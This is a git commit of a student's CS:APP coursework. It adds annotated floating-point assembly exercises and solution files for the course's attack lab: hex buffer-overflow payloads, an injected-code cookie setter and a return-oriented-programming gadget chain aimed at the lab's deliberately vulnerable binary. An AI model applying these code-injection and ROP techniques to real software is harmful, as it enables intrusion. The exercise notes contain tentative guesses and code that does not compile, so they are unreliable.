From 7ae6aa6a64f3f697edb90bb573862bf31dd14e69 Mon Sep 17 00:00:00 2001 From: Mike Vink Date: Tue, 9 Jul 2024 09:06:58 +0200 Subject: chapter 3: reading excercises + attacklab --- 3/11_floating_point/50_fcvt2.c | 27 +++++++++++++++++++++++++++ 3/11_floating_point/51_cvt.c | 18 ++++++++++++++++++ 3/11_floating_point/52_args.c | 20 ++++++++++++++++++++ 3/11_floating_point/53_funct1.c | 29 +++++++++++++++++++++++++++++ 3/11_floating_point/54_funct2.c | 16 ++++++++++++++++ 3/11_floating_point/55_lc3.c | 7 +++++++ 3/11_floating_point/56_simplefun.c | 25 +++++++++++++++++++++++++ 3/11_floating_point/57_funct3.c | 27 +++++++++++++++++++++++++++ labs/attacklab/solution/ctarget.1.txt | 1 + labs/attacklab/solution/ctarget.2.txt | 2 ++ labs/attacklab/solution/ctarget.3.txt | 1 + labs/attacklab/solution/ctarget.4.txt | 9 +++++++++ labs/attacklab/solution/farm.yaml | 35 +++++++++++++++++++++++++++++++++++ labs/attacklab/solution/set_cookie.s | 3 +++ labs/attacklab/solution/stack.c | 27 +++++++++++++++++++++++++++ 15 files changed, 247 insertions(+) create mode 100644 3/11_floating_point/50_fcvt2.c create mode 100644 3/11_floating_point/51_cvt.c create mode 100644 3/11_floating_point/52_args.c create mode 100644 3/11_floating_point/53_funct1.c create mode 100644 3/11_floating_point/54_funct2.c create mode 100644 3/11_floating_point/55_lc3.c create mode 100644 3/11_floating_point/56_simplefun.c create mode 100644 3/11_floating_point/57_funct3.c create mode 100644 labs/attacklab/solution/ctarget.1.txt create mode 100644 labs/attacklab/solution/ctarget.2.txt create mode 100644 labs/attacklab/solution/ctarget.3.txt create mode 100644 labs/attacklab/solution/ctarget.4.txt create mode 100644 labs/attacklab/solution/farm.yaml create mode 100644 labs/attacklab/solution/set_cookie.s create mode 100644 labs/attacklab/solution/stack.c diff --git a/3/11_floating_point/50_fcvt2.c b/3/11_floating_point/50_fcvt2.c new file mode 100644 index 0000000..052462e --- /dev/null +++ b/3/11_floating_point/50_fcvt2.c @@ -0,0 +1,27 @@ +#include + +// ip = rdi +// fp = rsi +// dp = rdx +// l = rcx +// fcvt: +// movl (%rdi), %eax eax<-int value of ip to eax +// vmovss (%rsi), %xmm0 xmm0<- move int value to float (vmov signed single?) +// vcvttsd2si (%rdx), %r8d r8d<- double value to signed integer? +// movl %r8d, (%rdi) *ip<- set pointer to truncated value of rdx +// vcvttsd2ss %eax, %xmm1, %xmm1 xmm1<- convert int to float +// vmovss %xmm1, (%rsi) fp<-*ip +// vcvtsi2sdq %rcx, %xmm1, %xmm1 xmm1<- convert long to double +// vmovsd %xmm1, (%rdx) dp<- l +// vunpcklps %xmm0, %xmm0, %xmm0 +// vcvtps2pd %xmm0, %xmm0 +// ret +double fcvt2(int *ip, float *fp, double *dp, long l) +{ + int i = *ip; float f = *fp; double d = *dp; + + *ip = (int) d; + *fp = (float) i; + *dp = (double) l; + return (double) f; +} diff --git a/3/11_floating_point/51_cvt.c b/3/11_floating_point/51_cvt.c new file mode 100644 index 0000000..053a657 --- /dev/null +++ b/3/11_floating_point/51_cvt.c @@ -0,0 +1,18 @@ +typedef int dest_t +typedef int src_t + +dest_t cvt(src_t x) +{ + dest_t y = (dest_t) x; + return y; +} + +// T_x T_y Instruction(s) +// +// long double vcvtsi2sdq %rdi, %xmm0 +// double int vcvttsd2si %xmm0, %rdi +// double float vmovddup %xmm0, %xmm0 +// vcvtpd2psx %xmm0, %xmm0 +// long float vcvtsi2ssq %rdi, %xmm0 +// float long vcvttss2siq %xmm0, %rdi +// diff --git a/3/11_floating_point/52_args.c b/3/11_floating_point/52_args.c new file mode 100644 index 0000000..a21a235 --- /dev/null +++ b/3/11_floating_point/52_args.c @@ -0,0 +1,20 @@ +double g1(double a, long b, float c, int d); +// a in xmm0 +// b in %rdi +// c in xmm1 +// d in %rsi +double g2(int a, double *b, float *c, long d); +// a in %edi +// b in %rsi +// c in %rdx +// d in %rcx +double g3(double *a, double b, int c, float d); +// a in %rdi +// b in %rsi +// c in %edx +// d in %xmm0 +double g4(float a, int *b, float c, double d); +// a in %xmm0 +// b in %rdi +// c in %xmm1 +// d in %rsi diff --git a/3/11_floating_point/53_funct1.c b/3/11_floating_point/53_funct1.c new file mode 100644 index 0000000..8147b62 --- /dev/null +++ b/3/11_floating_point/53_funct1.c @@ -0,0 +1,29 @@ +typedef arg1_t int; +typedef arg2_t double; +typedef arg3_t double; + +typedef arg4_t double; +double funct1(arg1_t p, arg2_t q, arg3_t r, double s) +{ + return p/(q+r) - s; +} +// funct 1: +// vcvtsi2ssq %rsi, %xmm2, %xmm2 convert long to double? +// vaddss %xmm0, %xmm2, %xmm0 xmm0 <- xmm2 + xmm0 (q+r) +// vcvtsi2ss %edi, %xmm2, %xmm2 convert to float (p) +// vdivss %xmm0, %xmm2, %xmm0 xmm0 <- xmm2 (p float) / xmm0 (q+r float) +// vunpcklps %xmm0, %xmm0, %xmm0 convert float to double? +// vcvtps2pd %xmm0, %xmm0 convert float to double? +// vsubsd %xmm1, %xmm0, %xmm0 xmm0 <- xmm0 - (double) s? +// ret + +// s must be in xmm1, it's only used at the end to subtract from xmm0, it must also be double since vsubsd is used +// +// p q r q+r p/(q+r) +// rdi, int, since it's xmm0, float rsi, long float, xmm0 float, xmm0 +// converted +// on line 3 +// +// rdi, int, since it's rsi, long xmm0, float float, xmm0 float, xmm0 +// converted +// on line 3 diff --git a/3/11_floating_point/54_funct2.c b/3/11_floating_point/54_funct2.c new file mode 100644 index 0000000..66c26c8 --- /dev/null +++ b/3/11_floating_point/54_funct2.c @@ -0,0 +1,16 @@ +double funct2(double w, int x, float y, long z) +{ + return x*y - w/z; +} + +// double funct2(double w, int x, float y, long z) +// w in xmm0, x in edi, y in xmm1, z in rsi +// funct2: +// vcvtsi2ss %edi, %xmm2, %xmm2 // convert int to float +// vmulss %xmm1, %xmm2, %xmm1 // xmm1<- x*y, multiply sencond and third float +// vunpcklps %xmm1, %xmm1, %xmm1 // do convert float to double? +// vcvtps2pd %xmm1, %xmm2 // do convert float to double? +// vcvtsi2sdq %rsi, %xmm1, %xmm1 // xmm1 <- z, convert long to double? +// vdivsd %xmm1, %xmm0, %xmm0 // xmm0<- w/z +// vsubsd %xmm0, %xmm2, %xmm0 // xmm0<- (x*y) - w/z +// ret diff --git a/3/11_floating_point/55_lc3.c b/3/11_floating_point/55_lc3.c new file mode 100644 index 0000000..31cd59e --- /dev/null +++ b/3/11_floating_point/55_lc3.c @@ -0,0 +1,7 @@ +// 0000000000000404 +// 0000000000000000000000000000000000000000000000000000 01000000010 0 +// +// V= 2^(1028 - 1023) * (1 + f) +// V=2^5 +// V=32 +print("{:064x}".format(1077936128)) diff --git a/3/11_floating_point/56_simplefun.c b/3/11_floating_point/56_simplefun.c new file mode 100644 index 0000000..66569fa --- /dev/null +++ b/3/11_floating_point/56_simplefun.c @@ -0,0 +1,25 @@ +#define EXPR + +double simplefun(double x) { + return EXPR(x); +} +// A +// vmovsd .LC1(%rip), %xmm1 +// vandpd %xmm1, xmm0, xmm0 +// .LC1: +// 1111111111111111111111111111111111111111111111111111 11111111111 0 +// +// Checks if any bit is set in the arg by anding with all ones +// +// +// B +// vxorpd %xmm0, %xmm0, %xmm0 +// +// Sets the argument to zero +// +// C +// vmovsd .LC2(%rip), %xmm1 +// vxorpd xmm1, %xmm0, %xmm0 +// 10000000000000000000000000000000 00000000000000000000000000000000 +// +// Flipping the sign bit diff --git a/3/11_floating_point/57_funct3.c b/3/11_floating_point/57_funct3.c new file mode 100644 index 0000000..5397330 --- /dev/null +++ b/3/11_floating_point/57_funct3.c @@ -0,0 +1,27 @@ +double funct3(int *ap, double b, long c, float *dp) { + int a = *ap; + float d = *dp; + if (b <= a) { + return (c * d); + } + return (c + 2 * d); +} + +// ap in rdi, b in xmm0, c in rsi, dp in rdx +// funct3: +// vmovss (%rdx), %xmm1 // y <- dp +// vcvtsi2sd (%rdi), %xmm2, %xmm2 // z <- (double a) +// vucomisd %xmm2, %xmm0 // compare: (<= b z ) +// jbe .L8 // jump to .L8: if < +// vcvtsi2ssq %rsi, %xmm0, %xmm0 // x <- (float) c +// vmulss %xmm1, %xmm0, %xmm1 // y <- (* x y) +// vunpcklps %xmm1, %xmm1, %xmm1 // float->double +// vcvtps2pd %xmm1, %xmm0 // float->double +// ret +// .L8: +// vaddss %xmm1, %xmm1, %xmm1 // y <- (+ y y ) +// vcvtsi2ssq %rsi, %xmm0, %xmm0 // x <- (float c) +// vaddss %xmm1, %xmm0, %xmm0 // x <- x + y +// vunpcklps %xmm0, %xmm0, %xmm0 // float->double +// vcvtps2pd %xmm0, %xmm0 // float->double +// ret diff --git a/labs/attacklab/solution/ctarget.1.txt b/labs/attacklab/solution/ctarget.1.txt new file mode 100644 index 0000000..2779c46 --- /dev/null +++ b/labs/attacklab/solution/ctarget.1.txt @@ -0,0 +1 @@ +ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de c0 17 40 00 00 00 00 00 diff --git a/labs/attacklab/solution/ctarget.2.txt b/labs/attacklab/solution/ctarget.2.txt new file mode 100644 index 0000000..fb116d2 --- /dev/null +++ b/labs/attacklab/solution/ctarget.2.txt @@ -0,0 +1,2 @@ +bf fa 97 b9 59 68 ec 17 40 00 c3 de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de 78 dc 61 55 00 00 00 00 + diff --git a/labs/attacklab/solution/ctarget.3.txt b/labs/attacklab/solution/ctarget.3.txt new file mode 100644 index 0000000..0cdf60c --- /dev/null +++ b/labs/attacklab/solution/ctarget.3.txt @@ -0,0 +1 @@ +48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 00 00 00 00 00 00 00 00 00 ad de ef be ad de ef be ad de ef be ad de ef be ad de 78 dc 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00 diff --git a/labs/attacklab/solution/ctarget.4.txt b/labs/attacklab/solution/ctarget.4.txt new file mode 100644 index 0000000..d322873 --- /dev/null +++ b/labs/attacklab/solution/ctarget.4.txt @@ -0,0 +1,9 @@ +ef be ad de ef be ad de /* rsp - 40 */ +ef be ad de ef be ad de /* rsp - 32 */ +ef be ad de ef be ad de /* rsp - 24 */ +ef be ad de ef be ad de /* rsp - 16 */ +ef be ad de ef be ad de /* rsp - 8 */ +ab 19 40 00 00 00 00 00 /* return address: call addval_219+4 */ +fa 97 b9 59 00 00 00 00 /* cookie: popped into rax */ +a2 19 40 00 00 00 00 00 /* return address: call addval_273+2 */ +ec 17 40 00 00 00 00 00 /* return address: call touch2 */ diff --git a/labs/attacklab/solution/farm.yaml b/labs/attacklab/solution/farm.yaml new file mode 100644 index 0000000..d425028 --- /dev/null +++ b/labs/attacklab/solution/farm.yaml @@ -0,0 +1,35 @@ +getval_142: + 3: | + nop + nop + ret + +addval_273: + 2: | + movq %rax, %rdi + ret + 3: | + movl %eax, %edi + ret + +addval_219: + 4: | + popq %rax + nop + ret + +# 00 00 00 00 00 40 17 ec // return address: call touch2 +# 00 00 00 00 00 40 19 a2 // return address: call addval_273+2 +# 00 00 00 00 a8 dc 61 55 // cookie: popped into rax +# 00 00 00 00 00 40 19 ab // return address: call addval_219+4 +# ef be ad de ef be ad de // rsp - 8 +# ef be ad de ef be ad de // rsp - 16 +# ef be ad de ef be ad de // rsp - 24 +# ef be ad de ef be ad de // rsp - 32 +# ef be ad de ef be ad de // rsp - 40 + +setval_237: + +setval_424: + + diff --git a/labs/attacklab/solution/set_cookie.s b/labs/attacklab/solution/set_cookie.s new file mode 100644 index 0000000..f11f435 --- /dev/null +++ b/labs/attacklab/solution/set_cookie.s @@ -0,0 +1,3 @@ +movq $0x5561dca8,%rdi +pushq $0x00000000004018fa +ret diff --git a/labs/attacklab/solution/stack.c b/labs/attacklab/solution/stack.c new file mode 100644 index 0000000..1c9002f --- /dev/null +++ b/labs/attacklab/solution/stack.c @@ -0,0 +1,27 @@ +// 00 00 00 00 00 00 00 00 // free space: int val +// 00 00 00 00 00 40 17 c0 // return address: call getbuf +// ef be ad de ef be ad de // rsp - 8 +// ef be ad de ef be ad de // rsp - 16 +// ef be ad de ef be ad de // rsp - 24 +// ef be ad de ef be ad de // rsp - 32 +// ef be ad de ef be ad de // rsp - 40 + +ef be ad de ef be ad de +ef be ad de ef be ad de +ef be ad de ef be ad de +ef be ad de ef be ad de +ef be ad de ef be ad de +40 17 c0 00 00 00 00 00 + + +0x5561dc78: 0x17ec6859b997fabf 0xdeadbeefdec30040 +0x5561dc88: 0xdeadbeefdeadbeef 0xdeadbeefdeadbeef +0x5561dc98: 0xdeadbeefdeadbeef 0x0000000000000000 + +59 b9 97 fa + +006166373939623935 + +0x5561dc78: 0xdeadbeefdeadbeef 0xdeadbeefdeadbeef +0x5561dc88: 0xdeadbeefdeadbeef 0x35adbeefdeadbeef +0x5561dc98: 0x0061663739396239 0x000000005561dc78 -- cgit v1.2.3